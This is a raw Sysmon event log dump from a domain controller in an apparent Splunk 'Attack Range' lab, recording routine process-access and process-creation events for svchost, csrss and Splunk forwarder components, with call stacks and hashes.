10:40:19.026{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002285Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:19.026{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002284Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:19.026{733EE690-3DF7-5F80-0500-000000007F01}644660C:\Windows\system32\csrss.exe{733EE690-3E12-5F80-6A00-000000007F01}3816C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002283Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:19.026{733EE690-3E09-5F80-3400-000000007F01}20324072C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{733EE690-3E12-5F80-6A00-000000007F01}3816C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000002282Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:18.858{733EE690-3E12-5F80-6A00-000000007F01}3816C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{733EE690-3DF7-5F80-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{733EE690-3E09-5F80-3400-000000007F01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002324Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:20.869{733EE690-3E14-5F80-6C00-000000007F01}40003992C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{733EE690-3E09-5F80-3400-000000007F01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002323Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:20.713{733EE690-3E0A-5F80-3D00-000000007F01}39003920C:\Windows\system32\conhost.exe{733EE690-3E14-5F80-6C00-000000007F01}4000C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002322Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:20.713{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002321Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:20.713{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002320Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:20.713{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002319Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:20.713{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002318Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:20.713{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002317Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:20.713{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002316Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:20.713{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002315Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:20.713{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002314Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:20.713{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002313Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:20.713{733EE690-3DF7-5F80-0500-000000007F01}6441144C:\Windows\system32\csrss.exe{733EE690-3E14-5F80-6C00-000000007F01}4000C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002312Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:20.713{733EE690-3E09-5F80-3400-000000007F01}20324072C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{733EE690-3E14-5F80-6C00-000000007F01}4000C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000002311Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:20.546{733EE690-3E14-5F80-6C00-000000007F01}4000C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{733EE690-3DF7-5F80-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{733EE690-3E09-5F80-3400-000000007F01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002338Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:21.526{733EE690-3E15-5F80-6D00-000000007F01}33763432C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{733EE690-3E09-5F80-3400-000000007F01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002337Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:21.385{733EE690-3E0A-5F80-3D00-000000007F01}39003920C:\Windows\system32\conhost.exe{733EE690-3E15-5F80-6D00-000000007F01}3376C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002336Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:21.385{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002335Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:21.385{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002334Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:21.385{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002333Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:21.385{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002332Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:21.385{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002331Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:21.385{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002330Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 